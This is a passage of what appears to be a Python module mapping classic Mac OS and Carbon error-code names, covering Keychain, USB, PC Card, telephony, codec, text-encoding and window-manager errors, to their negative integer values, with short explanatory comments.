errKCNoCertificateModule = -25313 #errKCNoCertificateModule
errKCNoStorageModule = -25312 #errKCNoStorageModule
errKCKeySizeNotAllowed = -25311 #errKCKeySizeNotAllowed
errKCWrongKCVersion = -25310 #errKCWrongKCVersion
errKCReadOnlyAttr = -25309 #errKCReadOnlyAttr
errKCInteractionNotAllowed = -25308 #errKCInteractionNotAllowed
errKCNoDefaultKeychain = -25307 #errKCNoDefaultKeychain
errKCNoSuchClass = -25306 #errKCNoSuchClass
errKCInvalidSearchRef = -25305 #errKCInvalidSearchRef
errKCInvalidItemRef = -25304 #errKCInvalidItemRef
errKCNoSuchAttr = -25303 #errKCNoSuchAttr
errKCDataTooLarge = -25302 #errKCDataTooLarge
errKCBufferTooSmall = -25301 #errKCBufferTooSmall
errKCItemNotFound = -25300 #errKCItemNotFound
errKCDuplicateItem = -25299 #errKCDuplicateItem
errKCInvalidCallback = -25298 #errKCInvalidCallback
errKCDuplicateCallback = -25297 #errKCDuplicateCallback
errKCDuplicateKeychain = -25296 #errKCDuplicateKeychain
errKCInvalidKeychain = -25295 #errKCInvalidKeychain
errKCNoSuchKeychain = -25294 #errKCNoSuchKeychain
errKCAuthFailed = -25293 #errKCAuthFailed
errKCReadOnly = -25292 #errKCReadOnly
errKCNotAvailable = -25291 #errKCNotAvailable
printerStatusOpCodeNotSupportedErr = -25280 #printerStatusOpCodeNotSupportedErr
kTXNOutsideOfFrameErr = -22018 #kTXNOutsideOfFrameErr
kTXNOutsideOfLineErr = -22017 #kTXNOutsideOfLineErr
kTXNATSUIIsNotInstalledErr = -22016 #kTXNATSUIIsNotInstalledErr
kTXNDataTypeNotAllowedErr = -22015 #kTXNDataTypeNotAllowedErr
kTXNCopyNotAllowedInEchoModeErr = -22014 #kTXNCopyNotAllowedInEchoModeErr
kTXNCannotTurnTSMOffWhenUsingUnicodeErr = -22013 #kTXNCannotTurnTSMOffWhenUsingUnicodeErr
kTXNAlreadyInitializedErr = -22012 #kTXNAlreadyInitializedErr
kTXNInvalidRunIndex = -22011 #kTXNInvalidRunIndex
kTXNSomeOrAllTagsInvalidForRunErr = -22010 #kTXNSomeOrAllTagsInvalidForRunErr
kTXNAttributeTagInvalidForRunErr = -22009 #dataValue is set to this per invalid tag
kTXNNoMatchErr = -22008 #kTXNNoMatchErr
kTXNRunIndexOutofBoundsErr = -22007 #kTXNRunIndexOutofBoundsErr
kTXNCannotSetAutoIndentErr = -22006 #kTXNCannotSetAutoIndentErr
kTXNBadDefaultFileTypeWarning = -22005 #kTXNBadDefaultFileTypeWarning
kTXNUserCanceledOperationErr = -22004 #kTXNUserCanceledOperationErr
kTXNIllegalToCrossDataBoundariesErr = -22003 #kTXNIllegalToCrossDataBoundariesErr
kTXNInvalidFrameIDErr = -22002 #kTXNInvalidFrameIDErr
kTXNCannotAddFrameErr = -22001 #kTXNCannotAddFrameErr
kTXNEndIterationErr = -22000 #kTXNEndIterationErr
invalidIndexErr = -20002 #The recordIndex parameter is not valid.
recordDataTooBigErr = -20001 #The record data is bigger than buffer size (1024 bytes).
unknownInsertModeErr = -20000 #There is no such insert mode.
kModemScriptMissing = -14002 #kModemScriptMissing
kModemPreferencesMissing = -14001 #kModemPreferencesMissing
kModemOutOfMemory = -14000 #kModemOutOfMemory
kHIDBaseError = -13950 #kHIDBaseError
kHIDNullStateErr = -13949 #kHIDNullStateErr
kHIDBufferTooSmallErr = -13948 #kHIDBufferTooSmallErr
kHIDValueOutOfRangeErr = -13947 #kHIDValueOutOfRangeErr
kHIDUsageNotFoundErr = -13946 #kHIDUsageNotFoundErr
kHIDNotValueArrayErr = -13945 #kHIDNotValueArrayErr
kHIDInvalidPreparsedDataErr = -13944 #kHIDInvalidPreparsedDataErr
kHIDIncompatibleReportErr = -13943 #kHIDIncompatibleReportErr
kHIDBadLogPhysValuesErr = -13942 #kHIDBadLogPhysValuesErr
kHIDInvalidReportTypeErr = -13941 #kHIDInvalidReportTypeErr
kHIDInvalidReportLengthErr = -13940 #kHIDInvalidReportLengthErr
kHIDNullPointerErr = -13939 #kHIDNullPointerErr
kHIDBadParameterErr = -13938 #kHIDBadParameterErr
kHIDNotEnoughMemoryErr = -13937 #kHIDNotEnoughMemoryErr
kHIDEndOfDescriptorErr = -13936 #kHIDEndOfDescriptorErr
kHIDUsagePageZeroErr = -13935 #kHIDUsagePageZeroErr
kHIDBadLogicalMinimumErr = -13934 #kHIDBadLogicalMinimumErr
kHIDBadLogicalMaximumErr = -13933 #kHIDBadLogicalMaximumErr
kHIDInvertedLogicalRangeErr = -13932 #kHIDInvertedLogicalRangeErr
kHIDInvertedPhysicalRangeErr = -13931 #kHIDInvertedPhysicalRangeErr
kHIDUnmatchedUsageRangeErr = -13930 #kHIDUnmatchedUsageRangeErr
kHIDInvertedUsageRangeErr = -13929 #kHIDInvertedUsageRangeErr
kHIDUnmatchedStringRangeErr = -13928 #kHIDUnmatchedStringRangeErr
kHIDUnmatchedDesignatorRangeErr = -13927 #kHIDUnmatchedDesignatorRangeErr
kHIDReportSizeZeroErr = -13926 #kHIDReportSizeZeroErr
kHIDReportCountZeroErr = -13925 #kHIDReportCountZeroErr
kHIDReportIDZeroErr = -13924 #kHIDReportIDZeroErr
kHIDInvalidRangePageErr = -13923 #kHIDInvalidRangePageErr
kHIDDeviceNotReady = -13910 #The device is still initializing, try again later
kHIDVersionIncompatibleErr = -13909 #kHIDVersionIncompatibleErr
debuggingNoMatchErr = -13887 #debugging component or option not found at this index
debuggingNoCallbackErr = -13886 #debugging component has no callback
debuggingInvalidNameErr = -13885 #componentName or optionName is invalid (NULL)
debuggingInvalidOptionErr = -13884 #optionSelectorNum is not registered
debuggingInvalidSignatureErr = -13883 #componentSignature not registered
debuggingDuplicateOptionErr = -13882 #optionSelectorNum already registered
debuggingDuplicateSignatureErr = -13881 #componentSignature already registered
debuggingExecutionContextErr = -13880 #routine cannot be called at this time
kBridgeSoftwareRunningCantSleep = -13038 #kBridgeSoftwareRunningCantSleep
kNoSuchPowerSource = -13020 #kNoSuchPowerSource
kProcessorTempRoutineRequiresMPLib2 = -13014 #kProcessorTempRoutineRequiresMPLib2
kCantReportProcessorTemperatureErr = -13013 #kCantReportProcessorTemperatureErr
kPowerMgtRequestDenied = -13010 #kPowerMgtRequestDenied
kPowerMgtMessageNotHandled = -13009 #kPowerMgtMessageNotHandled
kPowerHandlerNotFoundForProcErr = -13008 #kPowerHandlerNotFoundForProcErr
kPowerHandlerNotFoundForDeviceErr = -13007 #kPowerHandlerNotFoundForDeviceErr
kPowerHandlerExistsForDeviceErr = -13006 #kPowerHandlerExistsForDeviceErr
pmRecvEndErr = -13005 #during receive, pmgr did not finish handshake configured for this connection
pmRecvStartErr = -13004 #during receive, pmgr did not start handshake
pmSendEndErr = -13003 #during send, pmgr did not finish handshake
pmSendStartErr = -13002 #during send, pmgr did not start handshake
pmReplyTOErr = -13001 #Timed out waiting for reply
pmBusyErr = -13000 #Power Mgr never ready to start handshake
pictureDataErr = -11005 #the picture data was invalid
colorsRequestedErr = -11004 #the number of colors requested was illegal
cantLoadPickMethodErr = -11003 #unable to load the custom pick proc
pictInfoVerbErr = -11002 #the passed verb was invalid
pictInfoIDErr = -11001 #the internal consistency check for the PictInfoID is wrong
pictInfoVersionErr = -11000 #wrong version of the PictInfo structure
errTaskNotFound = -10780 #no task with that task id exists
telNotEnoughdspBW = -10116 #not enough real-time for allocation
telBadSampleRate = -10115 #incompatible sample rate
telBadSWErr = -10114 #Software not installed properly
telDetAlreadyOn = -10113 #detection is already turned on
telAutoAnsNotOn = -10112 #autoAnswer is not turned on
telValidateFailed = -10111 #telValidate failed
telBadProcID = -10110 #invalid procID
telDeviceNotFound = -10109 #device not found
telBadCodeResource = -10108 #code resource not found
telInitFailed = -10107 #initialization failed
telNoCommFolder = -10106 #Communications/Extensions not found
telUnknownErr = -10103 #unable to set config
telNoSuchTool = -10102 #unable to find tool with name specified
telBadFunction = -10091 #bad msgCode specified
telPBErr = -10090 #parameter block error, bad format
telCANotDeflectable = -10082 #CA not "deflectable"
telCANotRejectable = -10081 #CA not "rejectable"
telCANotAcceptable = -10080 #CA not "acceptable"
telTermNotOpen = -10072 #terminal not opened via TELOpenTerm
telStillNeeded = -10071 #terminal driver still needed by someone else
telAlreadyOpen = -10070 #terminal already open
telNoCallbackRef = -10064 #no call back reference was specified, but is required
telDisplayModeNotSupp = -10063 #display mode not supported by tool
telBadDisplayMode = -10062 #bad display mode specified
telFwdTypeNotSupp = -10061 #forward type not supported by tool
telDNTypeNotSupp = -10060 #DN type not supported by tool
telBadRate = -10059 #bad rate specified
telBadBearerType = -10058 #bad bearerType specified
telBadSelect = -10057 #unable to select or deselect DN
telBadParkID = -10056 #bad park id specified
telBadPickupGroupID = -10055 #bad pickup group ID specified
telBadFwdType = -10054 #bad fwdType specified
telBadFeatureID = -10053 #bad feature ID specified
telBadIntercomID = -10052 #bad intercom ID specified
telBadPageID = -10051 #bad page ID specified
telBadDNType = -10050 #DN type invalid
telConfLimitExceeded = -10047 #attempt to exceed switch conference limits
telCBErr = -10046 #call back feature not set previously
telTransferRej = -10045 #transfer request rejected
telTransferErr = -10044 #transfer not prepared
telConfRej = -10043 #conference request was rejected
telConfErr = -10042 #conference was not prepared
telConfNoLimit = -10041 #no limit was specified but required
telConfLimitErr = -10040 #limit specified is too high for this configuration
telFeatNotSupp = -10033 #feature program call not supported by this tool
telFeatActive = -10032 #feature already active
telFeatNotAvail = -10031 #feature subscribed but not available
telFeatNotSub = -10030 #feature not subscribed
errAEPropertiesClash = -10025 #illegal combination of properties settings for Set Data, make new, or duplicate
errAECantPutThatThere = -10024 #in make new, duplicate, etc. class can't be an element of container
errAENotAnEnumMember = -10023 #enumerated value in SetData is not allowed for this property
telIntExtNotSupp = -10022 #internal external type not supported by this tool
telBadIntExt = -10021 #bad internal external error
telStateNotSupp = -10020 #device state not supported by tool
telBadStateErr = -10019 #bad device state specified
telIndexNotSupp = -10018 #index not supported by this tool
telBadIndex = -10017 #bad index specified
telAPattNotSupp = -10016 #alerting pattern not supported by tool
telBadAPattErr = -10015 #bad alerting pattern specified
telVTypeNotSupp = -10014 #volume type not supported by this tool
telBadVTypeErr = -10013 #bad volume type error
telBadLevelErr = -10012 #bad volume level setting
telHTypeNotSupp = -10011 #hook type not supported by this tool
telBadHTypeErr = -10010 #bad hook type specified
errAECantSupplyType = -10009 #errAECantSupplyType
telNoOpenErr = -10008 #unable to open terminal
telNoMemErr = -10007 #no memory to allocate handle
errOSACantAssign = -10006 #Signaled when an object cannot be set in a container.
telBadProcErr = -10005 #bad msgProc specified
telBadHandErr = -10004 #bad handle specified
OSAIllegalAssign = -10003 #Signaled when an object can never be set in a container
telBadDNErr = -10002 #TELDNHandle not found or invalid
telBadTermErr = -10001 #invalid TELHandle or handle not found
errAEEventFailed = -10000 #errAEEventFailed
cannotMoveAttachedController = -9999 #cannotMoveAttachedController
controllerHasFixedHeight = -9998 #controllerHasFixedHeight
cannotSetWidthOfAttachedController = -9997 #cannotSetWidthOfAttachedController
controllerBoundsNotExact = -9996 #controllerBoundsNotExact
editingNotAllowed = -9995 #editingNotAllowed
badControllerHeight = -9994 #badControllerHeight
deviceCantMeetRequest = -9408 #deviceCantMeetRequest
seqGrabInfoNotAvailable = -9407 #seqGrabInfoNotAvailable
badSGChannel = -9406 #badSGChannel
couldntGetRequiredComponent = -9405 #couldntGetRequiredComponent
notEnoughDiskSpaceToGrab = -9404 #notEnoughDiskSpaceToGrab
notEnoughMemoryToGrab = -9403 #notEnoughMemoryToGrab
cantDoThatInCurrentMode = -9402 #cantDoThatInCurrentMode
grabTimeComplete = -9401 #grabTimeComplete
noDeviceForChannel = -9400 #noDeviceForChannel
kNoCardBusCISErr = -9109 #No valid CIS exists for this CardBus card
kNotZVCapableErr = -9108 #This socket does not support Zoomed Video
kCardPowerOffErr = -9107 #Power to the card has been turned off
kAttemptDupCardEntryErr = -9106 #The Enabler was asked to create a duplicate card entry
kAlreadySavedStateErr = -9105 #The state has been saved on previous call
kTooManyIOWindowsErr = -9104 #device requested more than one I/O window
kNotReadyErr = -9103 #PC Card failed to go ready
kClientRequestDenied = -9102 #CS Clients should return this code in order to
kNoCompatibleNameErr = -9101 #There is no compatible driver name for this device
kNoEnablerForCardErr = -9100 #No Enablers were found that can support the card
kNoCardEnablersFoundErr = -9099 #No Enablers were found
kUnsupportedCardErr = -9098 #Card not supported by generic enabler
kNoClientTableErr = -9097 #The client table has not been initialized yet
kNoMoreInterruptSlotsErr = -9096 #All internal Interrupt slots are in use
kNoMoreTimerClientsErr = -9095 #All timer callbacks are in use
kNoIOWindowRequestedErr = -9094 #Request I/O window before calling configuration
kBadCustomIFIDErr = -9093 #Custom interface ID is invalid
kBadTupleDataErr = -9092 #Data in tuple is invalid
kInvalidCSClientErr = -9091 #Card Services ClientID is not registered
kUnsupportedVsErr = -9090 #Unsupported Voltage Sense
kInvalidDeviceNumber = -9089 #kInvalidDeviceNumber
kPostCardEventErr = -9088 #_PCCSLPostCardEvent failed and dropped an event
kCantConfigureCardErr = -9087 #kCantConfigureCardErr
kPassCallToChainErr = -9086 #kPassCallToChainErr
kCardBusCardErr = -9085 #kCardBusCardErr
k16BitCardErr = -9084 #k16BitCardErr
kBadDeviceErr = -9083 #kBadDeviceErr
kBadLinkErr = -9082 #kBadLinkErr
kInvalidRegEntryErr = -9081 #kInvalidRegEntryErr
kNoCardSevicesSocketsErr = -9080 #kNoCardSevicesSocketsErr
kOutOfResourceErr = -9079 #Card Services has exhausted the resource
kNoMoreItemsErr = -9078 #there are no more of the requested item
kInUseErr = -9077 #requested resource is being used by a client
kConfigurationLockedErr = -9076 #a configuration has already been locked
kWriteProtectedErr = -9075 #media is write-protected
kBusyErr = -9074 #unable to process request at this time - try later
kUnsupportedModeErr = -9073 #mode is not supported
kUnsupportedFunctionErr = -9072 #function is not supported by this implementation
kNoCardErr = -9071 #no PC card in the socket
kGeneralFailureErr = -9070 #an undefined error has occurred
kWriteFailureErr = -9069 #unable to complete write request
kReadFailureErr = -9068 #unable to complete read request
kBadSpeedErr = -9067 #specified speed is unavailable
kBadCISErr = -9066 #CIS on card is invalid
kBadHandleErr = -9065 #clientHandle is invalid
kBadArgsErr = -9064 #values in argument packet are invalid
kBadArgLengthErr = -9063 #ArgLength argument is invalid
kBadWindowErr = -9062 #specified window is invalid
kBadVppErr = -9061 #specified Vpp1 or Vpp2 power level index is invalid
kBadVccErr = -9060 #specified Vcc power level index is invalid
kBadTypeErr = -9059 #specified window or interface type is invalid
kBadSocketErr = -9058 #specified logical or physical socket number is invalid
kBadSizeErr = -9057 #specified size is invalid
kBadPageErr = -9056 #specified page is invalid
kBadOffsetErr = -9055 #specified PC card memory array offset is invalid
kBadIRQErr = -9054 #specified IRQ level is invalid
kBadEDCErr = -9053 #specified EDC generator specified is invalid
kBadBaseErr = -9052 #specified base system memory address is invalid
kBadAttributeErr = -9051 #specified attributes field value is invalid
kBadAdapterErr = -9050 #invalid adapter number
codecOffscreenFailedPleaseRetryErr = -8992 #codecOffscreenFailedPleaseRetryErr
lockPortBitsWrongGDeviceErr = -8991 #lockPortBitsWrongGDeviceErr
directXObjectAlreadyExists = -8990 #directXObjectAlreadyExists
codecDroppedFrameErr = -8989 #returned from ImageCodecDrawBand
codecOffscreenFailedErr = -8988 #codecOffscreenFailedErr
codecNeedAccessKeyErr = -8987 #codec needs password in order to decompress
codecParameterDialogConfirm = -8986 #codecParameterDialogConfirm
lockPortBitsSurfaceLostErr = -8985 #lockPortBitsSurfaceLostErr
lockPortBitsBadPortErr = -8984 #lockPortBitsBadPortErr
lockPortBitsWindowClippedErr = -8983 #lockPortBitsWindowClippedErr
lockPortBitsWindowResizedErr = -8982 #lockPortBitsWindowResizedErr
lockPortBitsWindowMovedErr = -8981 #lockPortBitsWindowMovedErr
lockPortBitsBadSurfaceErr = -8980 #lockPortBitsBadSurfaceErr
codecNeedToFlushChainErr = -8979 #codecNeedToFlushChainErr
codecDisabledErr = -8978 #codec disabled itself -- pass codecFlagReenable to reset
codecNoMemoryPleaseWaitErr = -8977 #codecNoMemoryPleaseWaitErr
codecNothingToBlitErr = -8976 #codecNothingToBlitErr
codecCantQueueErr = -8975 #codecCantQueueErr
codecCantWhenErr = -8974 #codecCantWhenErr
codecOpenErr = -8973 #codecOpenErr
codecConditionErr = -8972 #codecConditionErr
codecExtensionNotFoundErr = -8971 #codecExtensionNotFoundErr
codecDataVersErr = -8970 #codecDataVersErr
codecBadDataErr = -8969 #codecBadDataErr
codecWouldOffscreenErr = -8968 #codecWouldOffscreenErr
codecAbortErr = -8967 #codecAbortErr
codecSpoolErr = -8966 #codecSpoolErr
codecImageBufErr = -8965 #codecImageBufErr
codecScreenBufErr = -8964 #codecScreenBufErr
codecSizeErr = -8963 #codecSizeErr
codecUnimpErr = -8962 #codecUnimpErr
noCodecErr = -8961 #noCodecErr
codecErr = -8960 #codecErr
kIllegalClockValueErr = -8852 #kIllegalClockValueErr
kUTCOverflowErr = -8851 #kUTCOverflowErr
kUTCUnderflowErr = -8850 #kUTCUnderflowErr
kATSULastErr = -8809 #The last ATSUI error code.
kATSULineBreakInWord = -8808 #This is not an error code but is returned by ATSUBreakLine to
kATSUCoordinateOverflowErr = -8807 #Used to indicate the coordinates provided to an ATSUI routine caused
kATSUNoFontScalerAvailableErr = -8806 #Used when no font scaler is available for the font passed
kATSUNoFontCmapAvailableErr = -8805 #Used when no CMAP table can be accessed or synthesized for the
kATSULowLevelErr = -8804 #Used when an error was encountered within the low level ATS
kATSUQuickDrawTextErr = -8803 #Used when QuickDraw Text encounters an error rendering or measuring
kATSUNoStyleRunsAssignedErr = -8802 #Used when an attempt was made to measure, highlight or draw
kATSUNotSetErr = -8801 #Used when the client attempts to retrieve an attribute,
kATSUInvalidCacheErr = -8800 #Used when an attempt was made to read in style data
kATSUInvalidAttributeTagErr = -8799 #Used when an attempt was made to use a tag value that
kATSUInvalidAttributeSizeErr = -8798 #Used when an attempt was made to use an attribute with a
kATSUInvalidAttributeValueErr = -8797 #Used when an attempt was made to use an attribute with
kATSUInvalidFontErr = -8796 #Used when an attempt was made to use an invalid font ID.
kATSUNoCorrespondingFontErr = -8795 #This value is returned by font ID conversion
kATSUFontsNotMatched = -8794 #This value is returned by ATSUMatchFontsToText()
kATSUFontsMatched = -8793 #This is not an error code but is returned by
kATSUInvalidTextRangeErr = -8792 #An attempt was made to extract information
kATSUInvalidStyleErr = -8791 #An attempt was made to use a ATSUStyle which
kATSUInvalidTextLayoutErr = -8790 #An attempt was made to use a ATSUTextLayout
kTECOutputBufferFullStatus = -8785 #output buffer has no room for conversion of next input text element (partial conversion)
kTECNeedFlushStatus = -8784 #kTECNeedFlushStatus
kTECUsedFallbacksStatus = -8783 #kTECUsedFallbacksStatus
kTECItemUnavailableErr = -8771 #item (e.g. name) not available for specified region (& encoding if relevant)
kTECGlobalsUnavailableErr = -8770 #globals have already been deallocated (premature TERM)
unicodeChecksumErr = -8769 #unicodeChecksumErr
unicodeNoTableErr = -8768 #unicodeNoTableErr
unicodeVariantErr = -8767 #unicodeVariantErr
unicodeFallbacksErr = -8766 #unicodeFallbacksErr
unicodePartConvertErr = -8765 #unicodePartConvertErr
unicodeBufErr = -8764 #unicodeBufErr
unicodeCharErr = -8763 #unicodeCharErr
unicodeElementErr = -8762 #unicodeElementErr
unicodeNotFoundErr = -8761 #unicodeNotFoundErr
unicodeTableFormatErr = -8760 #unicodeTableFormatErr
unicodeDirectionErr = -8759 #unicodeDirectionErr
unicodeContextualErr = -8758 #unicodeContextualErr
unicodeTextEncodingDataErr = -8757 #unicodeTextEncodingDataErr
kTECDirectionErr = -8756 #direction stack overflow, etc.
kTECIncompleteElementErr = -8755 #text element may be incomplete or is too long for internal buffers
kTECUnmappableElementErr = -8754 #kTECUnmappableElementErr
kTECPartialCharErr = -8753 #input buffer ends in the middle of a multibyte character, conversion stopped
kTECBadTextRunErr = -8752 #kTECBadTextRunErr
kTECArrayFullErr = -8751 #supplied name buffer or TextRun, TextEncoding, or UnicodeMapping array is too small
kTECBufferBelowMinimumSizeErr = -8750 #output buffer too small to allow processing of first input text element
kTECNoConversionPathErr = -8749 #kTECNoConversionPathErr
kTECCorruptConverterErr = -8748 #invalid converter object reference
kTECTableFormatErr = -8747 #kTECTableFormatErr
kTECTableChecksumErr = -8746 #kTECTableChecksumErr
kTECMissingTableErr = -8745 #kTECMissingTableErr
kTextUndefinedElementErr = -8740 #text conversion errors
kTextMalformedInputErr = -8739 #in DBCS, for example, high byte followed by invalid low byte
kTextUnsupportedEncodingErr = -8738 #specified encoding not supported for this operation
kRANotEnabled = -7139 #kRANotEnabled
kRACallBackFailed = -7138 #kRACallBackFailed
kRADuplicateIPAddr = -7137 #kRADuplicateIPAddr
kRANCPRejectedbyPeer = -7136 #kRANCPRejectedbyPeer
kRAExtAuthenticationFailed = -7135 #kRAExtAuthenticationFailed
kRAATalkInactive = -7134 #kRAATalkInactive
kRAPeerNotResponding = -7133 #kRAPeerNotResponding
kRAPPPPeerDisconnected = -7132 #kRAPPPPeerDisconnected
kRAPPPUserDisconnected = -7131 #kRAPPPUserDisconnected
kRAPPPNegotiationFailed = -7130 #kRAPPPNegotiationFailed
kRAPPPAuthenticationFailed = -7129 #kRAPPPAuthenticationFailed
kRAPPPProtocolRejected = -7128 #kRAPPPProtocolRejected
dcmBufferOverflowErr = -7127 #data is larger than buffer size
kRANotPrimaryInterface = -7126 #when IPCP is not primary TCP/IP intf.
kRATCPIPNotConfigured = -7125 #TCP/IP not configured, could be loaded
kRATCPIPInactive = -7124 #TCP/IP inactive, cannot be loaded
kRARemoteAccessNotReady = -7123 #kRARemoteAccessNotReady
kRAInitOpenTransportFailed = -7122 #kRAInitOpenTransportFailed
dcmProtectedErr = -7121 #need keyword to use dictionary
kRAUserPwdEntryRequired = -7120 #kRAUserPwdEntryRequired
kRAUserPwdChangeRequired = -7119 #kRAUserPwdChangeRequired
dcmBadFindMethodErr = -7118 #no such find method supported
kRAInvalidSerialProtocol = -7117 #kRAInvalidSerialProtocol
kRAInvalidPortState = -7116 #kRAInvalidPortState
dcmBadKeyErr = -7115 #bad key information
kRAPortBusy = -7114 #kRAPortBusy
kRAInstallationDamaged = -7113 #kRAInstallationDamaged
dcmBadFieldTypeErr = -7112 #no such field type supported
dcmBadFieldInfoErr = -7111 #incomplete information
dcmNecessaryFieldErr = -7110 #lacks a required or identifying field
dcmDupRecordErr = -7109 #same record already exists
kRANotConnected = -7108 #kRANotConnected
dcmBlockFullErr = -7107 #dictionary block full
kRAMissingResources = -7106 #kRAMissingResources
dcmDictionaryBusyErr = -7105 #dictionary is busy
dcmDictionaryNotOpenErr = -7104 #dictionary not opened
dcmPermissionErr = -7103 #invalid permission
dcmBadDictionaryErr = -7102 #invalid dictionary
dcmNotDictionaryErr = -7101 #not dictionary
kRAInvalidParameter = -7100 #kRAInvalidParameter
laEngineNotFoundErr = -7000 #can't find the engine
laPropertyErr = -6999 #Error in properties
kUSBUnknownDeviceErr = -6998 #device ref not recognised
laPropertyIsReadOnlyErr = -6997 #the property is read only
laPropertyUnknownErr = -6996 #the property is unknown to this environment
laPropertyValueErr = -6995 #Invalid property value
laDictionaryTooManyErr = -6994 #too many dictionaries
laDictionaryUnknownErr = -6993 #can't use this dictionary with this environment
laDictionaryNotOpenedErr = -6992 #the dictionary is not opened
laTextOverFlowErr = -6991 #text is too long
laFailAnalysisErr = -6990 #analysis failed
laNoMoreMorphemeErr = -6989 #nothing to read
laInvalidPathErr = -6988 #path is not correct
kUSBNotHandled = -6987 #Notification was not handled (same as NotFound)
laEnvironmentNotFoundErr = -6986 #can't find the specified environment
laEnvironmentBusyErr = -6985 #specified environment is used
laTooSmallBufferErr = -6984 #output buffer is too small to store any result
kUSBFlagsError = -6983 #Unused flags not zeroed
kUSBAbortedError = -6982 #Pipe aborted
kUSBNoBandwidthError = -6981 #Not enough bandwidth available
kUSBPipeIdleError = -6980 #Pipe is Idle, it will not accept transactions
kUSBPipeStalledError = -6979 #Pipe has stalled, error needs to be cleared
kUSBUnknownInterfaceErr = -6978 #Interface ref not recognised
kUSBDeviceBusy = -6977 #Device is already being configured
kUSBDevicePowerProblem = -6976 #Device has a power problem
kUSBInvalidBuffer = -6975 #bad buffer, usually nil
kUSBDeviceSuspended = -6974 #Device is suspended
kUSBDeviceNotSuspended = -6973 #device is not suspended for resume
kUSBDeviceDisconnected = -6972 #Disconnected during suspend or reset
kUSBTimedOut = -6971 #Transaction timed out.
kUSBQueueAborted = -6970 #Pipe zero stall cleared.
kUSBPortDisabled = -6969 #The port you are attached to is disabled, use USBDeviceReset.
kUSBBadDispatchTable = -6950 #Improper driver dispatch table
kUSBUnknownNotification = -6949 #Notification type not defined
kUSBQueueFull = -6948 #Internal queue maxxed
kUSBLinkErr = -6916 #kUSBLinkErr
kUSBCRCErr = -6915 #Pipe stall, bad CRC
kUSBBitstufErr = -6914 #Pipe stall, bitstuffing
kUSBDataToggleErr = -6913 #Pipe stall, Bad data toggle
kUSBEndpointStallErr = -6912 #Device didn't understand
kUSBNotRespondingErr = -6911 #Pipe stall, No device, device hung
kUSBPIDCheckErr = -6910 #Pipe stall, PID CRC error
kUSBWrongPIDErr = -6909 #Pipe stall, Bad or wrong PID
kUSBOverRunErr = -6908 #Packet too large or more data than buffer
kUSBUnderRunErr = -6907 #Less data than buffer
kUSBRes1Err = -6906 #kUSBRes1Err
kUSBRes2Err = -6905 #kUSBRes2Err
kUSBBufOvrRunErr = -6904 #Host hardware failure on data in, PCI busy?
kUSBBufUnderRunErr = -6903 #Host hardware failure on data out, PCI busy?
kUSBNotSent1Err = -6902 #Transaction not sent
kUSBNotSent2Err = -6901 #Transaction not sent
kDMFoundErr = -6232 #Did not proceed because we found an item
kDMMainDisplayCannotMoveErr = -6231 #Trying to move main display (or a display mirrored to it)
kDMDisplayAlreadyInstalledErr = -6230 #Attempt to add an already installed display.
kDMDisplayNotFoundErr = -6229 #Could not find item (will someday remove).
kDMDriverNotDisplayMgrAwareErr = -6228 #Video Driver does not support display manager.
kDMSWNotInitializedErr = -6227 #Required software not initialized (e.g. window manager or display mgr).
kSysSWTooOld = -6226 #Missing critical pieces of System Software.
kDMMirroringNotOn = -6225 #Returned by all calls that need mirroring to be on to do their thing.
kDMCantBlock = -6224 #Mirroring is already on, can't Block now (call DMUnMirror() first).
kDMMirroringBlocked = -6223 #DMBlockMirroring() has been called.
kDMWrongNumberOfDisplays = -6222 #Can only handle 2 displays for now.
kDMMirroringOnAlready = -6221 #Returned by all calls that need mirroring to be off to do their thing.
kDMGenErr = -6220 #Unexpected Error
kQTSSUnknownErr = -6150 #kQTSSUnknownErr
collectionVersionErr = -5753 #collectionVersionErr
collectionIndexRangeErr = -5752 #collectionIndexRangeErr
collectionItemNotFoundErr = -5751 #collectionItemNotFoundErr
collectionItemLockedErr = -5750 #collectionItemLockedErr
kNavMissingKindStringErr = -5699 #kNavMissingKindStringErr
kNavInvalidCustomControlMessageErr = -5698 #kNavInvalidCustomControlMessageErr
kNavCustomControlMessageFailedErr = -5697 #kNavCustomControlMessageFailedErr
kNavInvalidSystemConfigErr = -5696 #kNavInvalidSystemConfigErr
kNavWrongDialogClassErr = -5695 #kNavWrongDialogClassErr
kNavWrongDialogStateErr = -5694 #kNavWrongDialogStateErr
dialogNoTimeoutErr = -5640 #dialogNoTimeoutErr
menuInvalidErr = -5623 #menu is invalid
menuItemNotFoundErr = -5622 #specified menu item wasn't found
menuUsesSystemDefErr = -5621 #GetMenuDefinition failed because the menu uses the system MDEF
menuNotFoundErr = -5620 #specified menu or menu ID wasn't found
windowWrongStateErr = -5615 #window is not in a state that is valid for the current action
windowManagerInternalErr = -5614 #something really weird happened inside the window manager
windowAttributesConflictErr = -5613 #passed some attributes that are mutually exclusive
windowAttributeImmutableErr = -5612 #tried to change attributes which can't be changed
errWindowDoesNotFitOnscreen = -5611 #ConstrainWindowToScreen could not make the window fit onscreen
errWindowNotFound = -5610 #returned from FindWindowOfClass
errFloatingWindowsNotInitialized = -5609 #called HideFloatingWindows or ShowFloatingWindows without calling InitFloatingWindows
errWindowsAlreadyInitialized = -5608 #tried to call InitFloatingWindows twice, or called InitWindows and then floating windows
errUserWantsToDragWindow = -5607 #if returned from TrackWindowProxyDrag, you should call DragWindow on the window
errCorruptWindowDescription = -5606 #tried to load a corrupt window description (size or version fields incorrect)
errUnrecognizedWindowClass = -5605 #tried to create a window with a bad WindowClass
errWindowPropertyNotFound = -5604 #tried to get a nonexistent property
errInvalidWindowProperty = -5603 #tried to access a property tag with private creator
errWindowDoesNotHaveProxy = -5602 #tried to do something requiring a proxy to a window which doesn't have a proxy
errUnsupportedWindowAttributesForClass = -5601 #tried to create a window with WindowAttributes not supported by the WindowClass
errInvalidWindowPtr = -5600 #tried to pass a bad WindowRef argument
gestaltLocationErr = -5553 #gestalt function ptr wasn't in sysheap
gestaltDupSelectorErr = -5552 #tried to add an entry that already existed
gestaltUndefSelectorErr = -5551 #undefined selector was passed to Gestalt
gestaltUnknownErr = -5550 #value returned if Gestalt doesn't know the answer
envVersTooBig = -5502 #Version bigger than call can handle
envBadVers = -5501 #Version non-positive
envNotPresent = -5500 #returned by glue.
qtsAddressBusyErr = -5421 #qtsAddressBusyErr
qtsConnectionFailedErr = -5420 #qtsConnectionFailedErr
qtsTimeoutErr = -5408 #qtsTimeoutErr
qtsUnknownValueErr = -5407 #qtsUnknownValueErr
qtsTooMuchDataErr = -5406 #qtsTooMuchDataErr
qtsUnsupportedFeatureErr = -5405 #qtsUnsupportedFeatureErr
qtsUnsupportedRateErr = -5404 #qtsUnsupportedRateErr
